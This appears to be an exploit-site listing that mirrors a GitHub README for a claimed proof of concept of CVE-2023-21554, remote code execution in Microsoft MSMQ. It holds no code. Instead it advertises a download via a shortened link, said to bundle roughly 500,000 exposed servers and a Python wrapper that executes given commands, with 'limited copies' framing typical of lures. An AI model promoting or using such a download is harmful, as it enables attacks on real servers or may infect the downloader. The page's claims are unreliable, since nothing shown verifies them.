Share
## https://sploitus.com/exploit?id=62866977-84EF-5442-A56B-514DE01F599F
# CVE-2023-21554-POC
CVE-2023-21554 unauthenticated RCE in Microsoft Message Queuing (MSMQ) aka QueueJumper

the vulnerablity is within msmq service, in which some popular softwares relies on it,
for example microsoft exchange server, while installing the exchange server by default it automaticaly
enable the msmq service in background
in conclusion all exchange servers atleast are having this vulnerable service running
the port can be exposed to internet/localy

as per the scanning diffirent sources there are ~500000 exposed servers arround the globe
which I included inside this download
and the simple python wrapper which will trigger the vulnerable point, and executes given command

to avoid abuse its available for limited copies. [download](http://bit.ly/3MCmQwv)
</p>

[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2F10xeye%2FCVE-2023-21554-POC&count_bg=%2379C83D&title_bg=%23555555&icon=&icon_color=%23E7E7E7&title=download&edge_flat=false)](http://bit.ly/3MCmQwv)